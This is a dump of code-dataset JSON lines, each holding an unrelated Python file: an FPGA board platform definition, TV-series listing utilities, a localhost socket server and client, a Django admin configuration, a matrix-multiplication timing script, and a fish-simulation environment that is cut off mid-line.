test_fractional(self):\n self.assertRaises(ArithmeticError, fib, 2.5)\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459193015","text":"import random\nabc = 'gxvxgxvegxvegxv'\ndef DWEXAGEDTLSFILE()-> str:\n recordtype = '{:0>1}'.format(95353)[:1]\n Agent_ID = '{:<6}'.format('d53dtetge')[:6]\n Agent_date_cease ='{:<8}'.format('16753434')[:8]\n Agent_name = '{:<56}'.format('Bobby')[:56]\n Successor_agent_ID = '{:<6}'.format('56')[:6]\n Telephone_no = '{:<20}'.format(19970630)[:20]\n ORG_unit_ID = '{:<6}'.format('d53dtetge')[:6]\n address1 = '{:<28}'.format(abc)[:28]\n address2 = '{:<28}'.format(abc)[:28]\n address3 = '{:<28}'.format(abc)[:28]\n address4 = '{:<18}'.format(abc)[:18]\n agent_postcode = '{:<8}'.format('ex44778347'[:4])\n agent_RLS_signal = '{:0>1}'.format('y')[:1]\n agent_abroad_signal = '{:0>1}'.format('y')[:1]\n return (recordtype + Agent_ID + Agent_date_cease + Agent_name + Successor_agent_ID + Telephone_no + ORG_unit_ID + address1 + address2 + address3 + address4 + agent_postcode + agent_RLS_signal + agent_abroad_signal)\n #return (recordtype + UTR + Date1 + Date2)\n #return line1\nf1 = DWEXAGEDTLSFILE()\nprint (f1)\n","sub_path":"DWEXAGEDTLSFILE.py","file_name":"DWEXAGEDTLSFILE.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381179305","text":"# This file is Copyright (c) 2019 (year 0 AG) Antti Lukats \n# This file is Copyright (c) 2014-2019 Florent Kermarrec \n# License: BSD\n\n# info about the board http://trenz.org/cyc1000-info\n\nfrom litex.build.generic_platform import *\nfrom litex.build.altera import AlteraPlatform\nfrom litex.build.altera.programmer import USBBlaster\n\n# IOs ----------------------------------------------------------------------------------------------\n\n_io = [\n (\"clk12\", 0, Pins(\"M2\"), IOStandard(\"3.3-V LVTTL\")), # 12MHz clock\n (\"user_led\", 0, Pins(\"M6\"), IOStandard(\"3.3-V LVTTL\")), # LED1\n\n (\"sw\", 0, Pins(\"N6\"), IOStandard(\"3.3-V LVTTL\")), # user\n\n (\"serial\", 0,\n Subsignal(\"tx\", Pins(\"T7\"), IOStandard(\"3.3-V LVTTL\")),\n Subsignal(\"rx\", Pins(\"R7\"), IOStandard(\"3.3-V LVTTL\"))\n ),\n\n (\"spiflash\", 0,\n Subsignal(\"cs_n\", Pins(\"D2\")),\n Subsignal(\"clk\", Pins(\"H1\")),\n Subsignal(\"mosi\", Pins(\"C1\")),\n Subsignal(\"miso\", Pins(\"H2\")),\n IOStandard(\"3.3-V LVTTL\"),\n ),\n\n\n (\"sdram_clock\", 0, Pins(\"B14\"), IOStandard(\"3.3-V LVTTL\")),\n (\"sdram\", 0,\n Subsignal(\"a\", Pins(\"A3 B5 B4 B3 C3 D3 E6 E7 D6 D8 A5 E8\")), #0, 1, ...\n Subsignal(\"ba\", Pins(\"A4 B6\")),\n Subsignal(\"cs_n\", Pins(\"A6\")),\n Subsignal(\"cke\", Pins(\"F8\")),\n Subsignal(\"ras_n\", Pins(\"B7\")),\n Subsignal(\"cas_n\", Pins(\"C8\")),\n Subsignal(\"we_n\", Pins(\"A7\")),\n Subsignal(\"dq\", Pins(\"B10 A10 B11 A11 A12 D9 B12 C9 D11 E11 A15 E9 D14 F9 C14 A14\")),\n Subsignal(\"dm\", Pins(\"B13 D12\")),\n IOStandard(\"3.3-V LVTTL\")\n ),\n\n\n (\"gpio_leds\", 0,\n Pins(\"M6 T4 T3 R3 T2 R4 N5 N3\"),\n IOStandard(\"3.3-V LVTTL\")\n ),\n\n # all IO not connected to peripherals mapped to MFIO\n # <- LEDS -> <- PMOD -> <- D0..D14, D11R, D12R -> <- AIN0..AIN7, AIN -> [C O I S i1 i2]\n (\"bbio\", 0, Pins(\"M6 T4 T3 R3 T2 R4 N5 N3 F13 F15 F16 D16 D15 C15 B16 C16 N16 L15 L16 K15 K16 J14 N2 N1 P2 J1 J2 K2 L2 K1 L1 R12 T13 R13 T14 P14 R14 T15 R11 T12 F3 G2 G1 D1 B1 C2\"),\n IOStandard(\"3.3-V LVTTL\")),\n\n\n]\n\n# Platform -----------------------------------------------------------------------------------------\n\nclass Platform(AlteraPlatform):\n default_clk_name = \"clk12\"\n default_clk_period = 83\n\n def __init__(self):\n AlteraPlatform.__init__(self, \"10CL025YU256C8G\", _io)\n self.add_platform_command(\"set_global_assignment -name FAMILY \\\"Cyclone 10 LP\\\"\")\n# self.add_platform_command(\"set_global_assignment -name ENABLE_CONFIGURATION_PINS OFF\")\n self.add_platform_command(\"set_global_assignment -name INTERNAL_FLASH_UPDATE_MODE \\\"SINGLE IMAGE WITH ERAM\\\"\")\n\n self.add_platform_command('set_global_assignment -name CYCLONEII_RESERVE_NCEO_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DATA0_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DATA1_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_FLASH_NCE_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DCLK_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n\n\n\n\n\n def create_programmer(self):\n return USBBlaster()\n","sub_path":"litex_boards/partner/platforms/cyc1000.py","file_name":"cyc1000.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102521764","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom tvm.common import io\nfrom tvm.common import analytics\nfrom tvm.common.constants import U_CHECK, U_CROSS\n\nfrom tvm.common.dt_utils import moment_ago\nfrom tvm.common.settings import settings\nfrom tvm.common.tvcollection import TVCollection\nfrom tvm.common.tvcollection import TVCollectionExtension\nfrom tvm.common.table import pad_table\nfrom tvm.common.table import print_table as print_generated_table\n\n\ndef _get_completion_status(series, is_completed):\n if is_completed:\n return U_CHECK\n ratio = analytics.get_percentage_completed(TVCollection, series)\n ratio_ = '[ {0:02d}% ]'.format(ratio)\n return U_CROSS + ' ' + ('[ - ]' if ratio == 0 else ratio_)\n\n\ndef generate_table(new=False, popular=False, anime=False):\n table = [['series title', 'last updated', 's&e', 'last watched', '']]\n\n for title, series in TVCollection.sort('title'):\n # If popular and series is not popular, ignore.\n if popular and title not in settings['POPULAR_SERIES']:\n continue\n\n # If completed and we're only looking for \"new\" series, ignore.\n is_completed = TVCollectionExtension.is_completed(series)\n if new and is_completed:\n continue\n\n # If not an anime but we're looking for anime, ignore.\n if anime and not TVCollectionExtension.is_anime(series):\n continue\n\n last_viewed = series['last_viewed'] or None\n last_updated = series['last_updated']\n latest_episode = series['latest']\n\n table.append([\n title,\n moment_ago(last_updated['recorded_at']),\n '(%s,%s)' % (latest_episode['season'], latest_episode['episode']),\n moment_ago(last_viewed['viewed_at'][-1] if last_viewed else None),\n ' ' * 3 + _get_completion_status(series, is_completed)\n ])\n return table\n\n\ndef _determine_season_status(episodes, viewed_episodes):\n if len(viewed_episodes) == len(episodes):\n return 'completed'\n if not viewed_episodes:\n return 'pending'\n return 'incomplete'\n\n\ndef _get_season_completion(episodes, viewed_episodes):\n season_status = ' [ {percentage}% | {viewed}/{total} ]'.format(**{\n 'percentage': int((len(viewed_episodes) / len(episodes)) * 100),\n 'viewed': len(viewed_episodes),\n 'total': len(episodes)\n })\n completion = U_CROSS\n if len(viewed_episodes) == len(episodes):\n completion = U_CHECK\n return completion + season_status\n\n\ndef _get_episode_view_status(episode):\n if len(episode['viewed_at']) <= 1:\n return U_CHECK if episode['viewed_at'] else U_CROSS\n return '%s \\033[0;33m(%s times)\\033[0m' % (U_CHECK, len(episode['viewed_at']))\n\n\ndef generate_tree(series, expand):\n table = [['s&e', 'last viewed', 'status']] if expand else []\n\n sorted_seasons = TVCollection.sort('season', seasons=series['seasons'])\n for season, episodes in sorted_seasons:\n viewed_episodes = [e for e in episodes if e['viewed_at']]\n\n status = _determine_season_status(episodes, viewed_episodes)\n if status == 'completed' and not expand:\n table.append(['s%s' % season, U_CHECK])\n elif status in ['pending', 'incomplete'] and not expand:\n episode_status = U_CROSS + ' [ {0:2d} ]'.format(len(episodes))\n table.append(['s%s' % season, episode_status])\n else:\n completion = _get_season_completion(episodes, viewed_episodes)\n table.append(['s%s' % season, '', completion])\n\n sorted_episodes = TVCollection.sort('episode', episodes=episodes)\n for i, episode in enumerate(sorted_episodes):\n table.append([\n ('~~|- %s' if i == 0 else ' |- %s') % episode['episode'],\n moment_ago(episode['viewed_at'][-1]) if episode['viewed_at'] else '--',\n _get_episode_view_status(episode)\n ])\n return table\n\n\ndef _print_recent_summary(last_updated, last_viewed):\n if last_viewed:\n last_updated.update({'recorded_at': moment_ago(last_updated['recorded_at'])})\n io.info2('last updated: \"{title},{season},{episode}\" ({recorded_at})'.format(**last_updated))\n\n if last_viewed:\n last_viewed.update({'viewed_at': moment_ago(last_viewed['viewed_at'][-1])})\n io.info2('last watched: \"{title},{season},{episode}\" ({viewed_at})'.format(**last_viewed))\n\n\ndef print_table(table):\n if len(table) == 1:\n return io.info('No series found')\n\n padded_table = pad_table(table, padding=3)\n print_generated_table(padded_table)\n io.info('{displayed} series displayed ({total} total, {completed}% completed)'.format(**{\n 'displayed': len(padded_table) - 1,\n 'total': len(TVCollection.collection),\n 'completed': analytics.get_percentage_completed(TVCollection)\n }))\n return _print_recent_summary(\n TVCollectionExtension.get_last_updated_episode(),\n TVCollectionExtension.get_last_viewed_episode()\n )\n\n\ndef print_tree(tree, series):\n padded_tree = pad_table(tree, padding=2)\n for row in padded_tree:\n io.info2(''.join(map(unicode, row)))\n\n percentage_completed = analytics.get_percentage_completed(TVCollection, series)\n data = {\n 'percentage': percentage_completed,\n 'viewed': series['episodes_viewed'],\n 'total': series['total_episodes'],\n }\n io.info('{percentage}% ({viewed}/{total}) episodes watched'.format(**data))\n _print_recent_summary(series['last_updated'], series['last_viewed'])\n","sub_path":"tvm/apps/list/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442121130","text":"import socket\n\nsock = socket.socket()\nprint(\"Socket successfully created...\")\nhost = socket.gethostname()\nprint(\"Socket created on: \" + str(sock.getsockname()) + \"...\")\nport = 26138\nprint(\"Opening port \" + str(port) + \" for communication...\")\nsock.bind((host, port))\nsock.listen(5)\nprint(str(sock.getsockname()))\nboard = [2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nwhile True:\n print(\"Server Started. Awaiting Connection....\")\n c, address = sock.accept()\n print(\"Connection established from: \" + repr(address[1]))\n # c.send(\"Connection established\")\n c.send(str(board).strip(\"[]\"))\n c.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649500140","text":"from django.contrib import admin\nfrom django.utils.html import mark_safe # 장고에게 사진을 믿을 수 있다는 확신을 주려고\nfrom . import models\n\n@admin.register(models.RoomType, models.Facility, models.Amenity, models.HouseRule)\nclass ItemAdmin(admin.ModelAdmin):\n\n list_display = (\n \"name\", \"used_by\"\n )\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\nclass PhotoInline(admin.StackedInline):\n model = models.Photo\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n \n \"\"\"Room Admin Definition\"\"\"\n\n inlines = (PhotoInline,)\n fieldsets = (\n (\n \"Basic Info\",\n {\n \"fields\": (\n \"name\",\n \"description\",\n \"country\",\n \"city\",\n \"address\",\n \"price\",\n \"room_type\",\n )\n },\n ),\n (\"Times\", {\"fields\": (\"check_in\", \"check_out\", \"instant_book\")}),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\")}),\n (\n \"More About the Space\",\n {\"fields\": (\"amenities\", \"facilities\", \"house_rules\")},\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n list_display = (\n \"name\", \"country\", \"city\", \"price\", \"guests\", \"beds\", \"bedrooms\", \"baths\", \"check_in\", \"check_out\", \n \"instant_book\", \"count_amenities\", \"count_photos\", \"total_rating\",\n )\n\n list_filter = (\"instant_book\", \"host__superhost\", \"room_type\", \"amenities\", \"facilities\", \"house_rules\", \"city\", \"country\",)\n \n raw_id_fields = (\"host\",)\n \n # seoul을 Seoul로 event intercept 하는 방법 seoul이라고 적어도 Seoul로 저장됨.\n # 아이템이 하나라고 해도 끝에 꼭 ,를 붙여줘야함. (\"=city\",) 이래야 형식이 유지됨.\n search_fields = (\"=city\", \"^host__username\")\n\n def count_amenities(self, obj):\n #self > roomadmin, obj > 현재 row\n # obj를 프린트하면 jousha tree house가 나옴\n # print(obj.amenities.all()) 하면 ]>가 나옴\n return obj.amenities.count()\n count_amenities.short_description = \"hello sexy!\"\n\n def count_photos(self, obj):\n return obj.photos.count()\n # rooms 안에 photos라는 related name이 있다는걸 앎\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n \"\"\" Photo Admin \"\"\"\n list_display = (\"__str__\", \"get_thumbnail\")\n\n def get_thumbnail(self, obj):\n return mark_safe(f'')\n\n get_thumbnail.short_description = \"Thumbnail\"","sub_path":"rooms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"198169741","text":"import socket\nimport sys\n\nserverIP = '127.0.0.1'\nserverPort = 2346\n\nclnt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclnt_sock.connect((serverIP, serverPort))\nprint(\"Connect to Server...\")\n\nclient_msg = sys.argv[1]\nclnt_sock.send(client_msg.encode())\n\nprint(\"Send Message to Server..\")\ndata = clnt_sock.recv(1024)\n\nparse_data = (data.decode()).split('\\n\\n')\ncheck = (parse_data[0].split())[1] # 200 or 404\n\nif check == '200':\n f = open('recv.html', 'w')\n f.write(parse_data[1])\n f.close\n print('Received Message from Server')\nelse:\n print('404 Not Found')\n\nclnt_sock.close()\n\n","sub_path":"2018/Computer Network/CN_201402448_한진영_03/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551634606","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\ndef usingLoops(a,b,j):\n multiplication = np.random.rand(j,j)\n start = time.time()\n for i in range(len(a)):\n for j in range(len(b[0])):\n for k in range(len(b)):\n multiplication[i][j] += a[i][k]*b[k][j]\n \n timeTaken = time.time() - start\n print(timeTaken, multiplication)\n\n return timeTaken\n\ndef usingNumpy(a,b):\n c = time.time()\n print(a.dot(b))\n timeTaken2 = time.time() - c\n\n return timeTaken2\n\ndef plot(D):\n plt.bar(range(len(D)), list(D.values()), align='center')\n plt.xticks(range(len(D)), list(D.keys()))\n plt.show()\n\nif __name__ == \"__main__\":\n val1 = {100:0,200:0,400:0}\n val2 = {100:0,200:0,400:0}\n \n firstMatrix = np.random.rand(100,100)\n secondMatrix = np.random.rand(200,200)\n thirdMatrix = np.random.rand(400,400)\n \n li = [firstMatrix, secondMatrix, thirdMatrix]\n j = 100\n\n for i in li:\n val1[j] = usingLoops(i,i,j)\n val2[j] = usingNumpy(i,i)\n j *=2\n\n print(val1, val2)\n\n sizes = [100,200,400]\n for j in sizes:\n val1[j] = val1[j]*1000\n val2[j] = val2[j]*1000\n\n print(val1, val2)\n\n plot(val1)\n plot(val2)","sub_path":"plotcompare.py","file_name":"plotcompare.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"456890934","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pymunk\n\nfrom Environment.base_environment import BaseEnvironment\nfrom Environment.Fish.fish import Fish\nfrom Environment.Fish.continuous_fish import ContinuousFish\nfrom Environment.Fish.continuous_tethered_fish import ContinuousTetheredFish\nfrom Environment.Fish.tethered_fish import TetheredFish\n\n\nclass ControlledStimulusEnvironmentContinuous(BaseEnvironment):\n \"\"\"\n This version is made with only the fixed projection configuration in mind.\n As a result, doesnt have walls, and fish appears directly in the centfre of the environment.\n For this environment, the following stimuli are available: prey, predators.\n \"\"\"\n\n def __init__(self, env_variables, stimuli, realistic_bouts, using_gpu, tethered=True, set_positions=False, moving=False,\n random=False, reset_each_step=False, reset_interval=1, background=None, draw_screen=False):\n super().__init__(env_variables, draw_screen, using_gpu)\n\n if tethered:\n self.fish = ContinuousTetheredFish(self.board, env_variables, self.dark_col, realistic_bouts)\n else:\n self.fish = ContinuousFish(self.board, env_variables, self.dark_col, realistic_bouts)\n self.space.add(self.fish.body, self.fish.mouth, self.fish.head, self.fish.tail)\n\n # TODO: Unify in future with other stimuli\n self.prey_positions = {}\n self.predator_positions = {}\n self.set_positions = set_positions\n self.random = random\n self.reset_at_interval = reset_each_step\n self.reset_interval = reset_interval\n\n # Whole environment measurements.\n board_height = env_variables[\"height\"]\n board_width = env_variables[\"width\"]\n\n # Wall coordinates\n self.wall_1_coordinates = [[0, 0], [0, board_height]]\n self.wall_2_coordinates = [[0, board_height], [board_width, board_height]]\n self.wall_3_coordinates = [[1, 1], [board_width,1]]\n self.wall_4_coordinates = [[board_width, 1], [board_width, board_height]]\n\n self.stimuli = stimuli\n\n self.stimuli_information = {stimulus: {} for stimulus in stimuli}\n\n self.create_walls()\n self.reset()\n\n if self.set_positions:\n self.create_positional_information(stimuli)\n else:\n if self.random:\n self.random_stimuli = stimuli\n else:\n self.unset_stimuli = stimuli\n self.moving_stimuli = moving\n\n self.edge_col = self.space.add_collision_handler(1, 3)\n self.edge_col.begin = self.touch_wall\n self.background = background\n self.pred_fish_col = self.space.add_collision_handler(3, 5)\n self.pred_fish_col.begin = self.no_collision\n self.prey_fish_col = self.space.add_collision_handler(3, 2)\n self.prey_fish_col.begin = self.no_collision\n\n self.continuous_actions = True\n\n\n def reset(self):\n super().reset()\n self.fish.body.position = (self.env_variables['width']/2, self.env_variables['height']/2)\n self.fish.body.angle = 0\n self.fish.body.velocity = (0, 0)\n self.create_stimuli(self.stimuli)\n\n def special_reset(self):\n self.fish.body.position = (self.env_variables['width'] / 2, self.env_variables['height'] / 2)\n self.fish.body.angle = 0\n self.fish.body.velocity = (0, 0)\n self.fish.hungry = 0\n\n def simulation_step(self, action, save_frames=False, frame_buffer=None, activations=None):\n if self.reset_at_interval and self.num_steps % self.reset_interval == 0:\n self.special_reset()\n if frame_buffer is None:\n frame_buffer = []\n self.fish.making_capture = False\n reward = self.fish.take_action(action)\n\n done = False\n\n self.fish.hungry += (1 - self.fish.hungry)*self.env_variables['hunger_inc_tau']\n self.fish.stress = self.fish.stress * self.env_variables['stress_compound']\n if self.predator_body is not None:\n self.fish.stress += 0.5\n\n # According to the projection general mode:\n if self.set_positions:\n self.update_stimuli()\n else:\n if self.random:\n self.update_random_stimuli()\n else:\n self.update_unset_stimuli()\n\n for micro_step in range(self.env_variables['phys_steps_per_sim_step']):\n self.space.step(self.env_variables['phys_dt'])\n if self.fish.touched_edge:\n self.fish.touched_edge = False\n if self.show_all:\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=True)\n if self.draw_screen:\n self.board_image.set_data(self.output_frame(activations, np.array([0, 0]), scale=0.5)/255.)\n plt.pause(0.0001)\n\n self.fish.body.position = (self.env_variables['width'] / 2, self.env_variables['height'] / 2)\n self.fish.body.angle = 0\n self.fish.body.velocity = (0, 0)\n\n self.num_steps += 1\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=False)\n\n right_eye_pos = (-np.cos(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[0],\n +np.sin(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[1])\n left_eye_pos = (+np.cos(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[0],\n -np.sin(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[1])\n\n self.fish.left_eye.read(left_eye_pos[0], left_eye_pos[1], self.fish.body.angle)\n self.fish.right_eye.read(right_eye_pos[0], right_eye_pos[1], self.fish.body.angle)\n\n in_light = self.fish.body.position[0] > self.dark_col\n\n if self.env_variables['hunger'] and self.env_variables['stress']:\n internal_state = np.array([[in_light, self.fish.hungry, self.fish.stress]])\n elif self.env_variables['hunger']:\n internal_state = np.array([[in_light, self.fish.hungry]])\n elif self.env_variables['stress']:\n internal_state = np.array([[in_light, self.fish.stress]])\n else:\n internal_state = np.array([[in_light]])\n\n if save_frames or self.draw_screen:\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=True)\n self.board.apply_light(self.dark_col, 0.7, 1)\n self.fish.left_eye.show_points(left_eye_pos[0], left_eye_pos[1], self.fish.body.angle)\n self.fish.right_eye.show_points(right_eye_pos[0], right_eye_pos[1], self.fish.body.angle)\n if save_frames:\n frame_buffer.append(self.output_frame(activations, internal_state, scale=0.25))\n if self.draw_screen:\n self.board_image.set_data(self.output_frame(activations, internal_state, scale=0.5) / 255.)\n plt.pause(0.000001)\n\n observation = np.dstack((self.fish.readings_to_photons(self.fish.left_eye.readings),\n self.fish.readings_to_photons(self.fish.right_eye.readings)))\n\n return observation, reward, internal_state, done, frame_buffer\n\n def create_stimuli(self, stimuli):\n for stimulus in stimuli:\n if \"prey\" in stimulus:\n self.create_prey()\n elif \"predator\" in stimulus:\n self.create_predator()\n\n @staticmethod\n def get_distance_for_size(stimulus, degree_size):\n if \"prey\" in stimulus:\n return 298.97 * np.exp(-0.133 * degree_size)\n elif \"predator\" in stimulus:\n return 298.97 * np.exp(-0.133 * degree_size/25)\n else:\n return 180\n\n def place_on_curve(self, stimulus_key, index, distance, angle):\n b = distance * np.sin(angle) + self.fish.body.position[0]\n a = distance * np.cos(angle) + self.fish.body.position[1]\n if \"prey\" in stimulus_key:\n self.prey_bodies[index].position = (a, b)\n elif \"predator\" in stimulus_key:\n self.predator_bodies[index].position = (a, b)\n\n def update_random_stimuli(self):\n # TODO: Add in baseline feature.\n stimuli_to_delete = []\n for i, stimulus, in enumerate(self.random_stimuli.keys()):\n if self.num_steps % self.unset_stimuli[stimulus][\"interval\"] == 0:\n if self.random_stimuli[stimulus][\"steps\"] > self.num_steps:\n d = self.get_distance_for_size(stimulus, self.random_stimuli[stimulus][\"size\"])\n theta = np.random.uniform(-0.75, 0.75) * np.pi\n self.place_on_curve(stimulus, i, d, theta)\n else:\n stimuli_to_delete.append(stimulus)\n for stimulus in stimuli_to_delete:\n del self.stimuli[stimulus]\n\n def get_new_angle(self, duration, current_steps):\n if self.moving_stimuli is False:\n if current_steps < 1:\n return 0.75 * np.pi\n else:\n progression = current_steps / duration\n return ((1.5 * progression) - 0.75) * np.pi\n else:\n if self.moving_stimuli == \"Right\":\n if current_steps < 1:\n return 0.75 * np.pi\n else:\n progression = current_steps / duration\n return ((1.5 * progression) - 0.75) * np.pi\n else:\n if current_steps < 1:\n return -0.75 * np.pi\n else:\n progression = (duration - current_steps) / duration\n return ((1.5 * progression) - 0.75) * np.pi\n\n @staticmethod\n def get_distance_moved_on_arc(theta_1, theta_2, d):\n # new_d = np.sqrt((p1[0]-p2[0])^2+(p1[1]-p2[1])^2)\n # angle = np.arccos((2*(d^2)-new_d^2)/(4*new_d))\n angle = abs(abs(theta_2)-abs(theta_1))\n return angle * d\n\n def get_new_distance(self, stimulus, interval, current_steps):\n if current_steps%interval == 0:\n current_steps = int(interval / 3)\n else:\n current_steps = (current_steps % interval) - (interval * 2/3)\n if \"prey\" in stimulus:\n sizes = np.linspace(5, 15, int(interval / 3) + 1)\n elif \"predator\" in stimulus:\n sizes = np.linspace(40, 80, int(interval/3)+1)\n else:\n print(\"Error\")\n sizes = np.linspace(5, 15, int(interval / 3) + 1)\n\n if self.moving_stimuli == \"Towards\":\n progression = int(current_steps)\n elif self.moving_stimuli == \"Away\":\n progression = int(round((interval/3)-current_steps))\n else:\n print(\"Wrong motion parameter\")\n progression = 0\n return self.get_distance_for_size(stimulus, sizes[progression])\n\n def update_unset_stimuli(self):\n # TODO: Still need to update so that can have multiple, sequential stimuli. Will require adding in onset into stimulus, as well as changing the baseline phase. Not useful for current requirements.\n stimuli_to_delete = []\n init_period = 100 # TODO: Parameterise\n\n for stimulus in self.unset_stimuli.keys():\n i = int(stimulus.split()[1]) - 1\n if self.num_steps <= init_period:\n # Networks initialisation period\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n else:\n\n if (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == 0:\n # Initialisation period\n self.stimuli_information[stimulus][\"Initialisation\"] = self.num_steps\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n\n elif (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == round(self.unset_stimuli[stimulus][\"interval\"]/3):\n # Pre onset period\n self.stimuli_information[stimulus][\"Pre-onset\"] = self.num_steps\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n\n elif (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == round(2 * self.unset_stimuli[stimulus][\"interval\"]/3):\n # Appearance period\n if self.unset_stimuli[stimulus][\"steps\"]-init_period > (self.num_steps-init_period):\n d = self.get_distance_for_size(stimulus, self.unset_stimuli[stimulus][\"size\"])\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period))\n self.place_on_curve(stimulus, i, d, theta)\n self.stimuli_information[stimulus][\"Onset\"] = self.num_steps\n self.stimuli_information[stimulus][\"Angle\"] = theta\n self.stimuli_information[stimulus][\"Size\"] = self.unset_stimuli[stimulus][\"size\"]\n\n if self.moving_stimuli:\n if self.moving_stimuli == \"Left\" or self.moving_stimuli == \"Right\":\n self.stimuli_information[stimulus][\"Direction\"] = self.moving_stimuli\n time = self.unset_stimuli[stimulus][\"interval\"]/3\n theta2 = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period) + self.unset_stimuli[stimulus][\"interval\"]/3)\n d_moved = self.get_distance_moved_on_arc(theta, theta2, d)\n self.stimuli_information[stimulus][\"Velocity\"] = d_moved/time\n elif self.moving_stimuli == \"Towards\" or self.moving_stimuli == \"Away\":\n self.stimuli_information[stimulus][\"Direction\"] = self.moving_stimuli\n time = self.unset_stimuli[stimulus][\"interval\"] / 3\n d2 = self.get_new_distance(stimulus, self.unset_stimuli[stimulus][\"interval\"], round((self.num_steps-init_period) + self.unset_stimuli[stimulus][\"interval\"]/3))\n d_moved = abs(d2 - d)\n self.stimuli_information[stimulus][\"Velocity\"] = d_moved/time\n else:\n print(\"Invalid *moving* parameter given\")\n else:\n self.stimuli_information[stimulus][\"Finish\"] = self.num_steps\n stimuli_to_delete.append(stimulus)\n\n else:\n if self.moving_stimuli and self.unset_stimuli[stimulus][\"interval\"] * 2/3 < (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"]:\n if self.moving_stimuli == \"Left\" or self.moving_stimuli == \"Right\":\n d = self.get_distance_for_size(stimulus, self.unset_stimuli[stimulus][\"size\"])\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period))\n self.place_on_curve(stimulus, i, d, theta)\n elif self.moving_stimuli == \"Towards\" or self.moving_stimuli == \"Away\":\n d = self.get_new_distance(stimulus, self.unset_stimuli[stimulus][\"interval\"], (self.num_steps-init_period))\n steps_for_angle = round(((self.num_steps-init_period)//self.unset_stimuli[stimulus][\"interval\"] * self.unset_stimuli[stimulus][\"interval\"]) + (2 * self.unset_stimuli[stimulus][\"interval\"] / 3))\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-100, steps_for_angle)\n self.place_on_curve(stimulus, i, d, theta)\n else:\n print(\"Invalid *moving* parameter given\")\n\n self.stimuli_information[stimulus] = {}\n for stimulus in stimuli_to_delete:\n del self.unset_stimuli[stimulus]\n\n def update_stimuli(self):\n \"\"\"For use with set positioned stimuli.\"\"\"\n finished_prey = []\n finished_predators = []\n for i, prey in enumerate(self.prey_positions):\n try:\n self.prey_bodies[i].position = (self.prey_positions[prey][self.num_steps][0],\n self.prey_positions[prey][self.num_steps][1])\n except IndexError:\n self.prey_bodies.pop(i)\n self.prey_shapes.pop(i)\n finished_prey.append(prey)\n\n for i, predator in enumerate(self.predator_positions):\n try:\n self.predator_bodies[i].position = (self.predator_positions[predator][self.num_steps][0],\n self.predator_positions[predator][self.num_steps][1])\n except IndexError:\n self.predator_bodies.pop(i)\n self.predator_shapes.pop(i)\n finished_predators.append(predator)\n\n for item in finished_prey:\n del self.prey_positions[item]\n for item in finished_predators:\n del 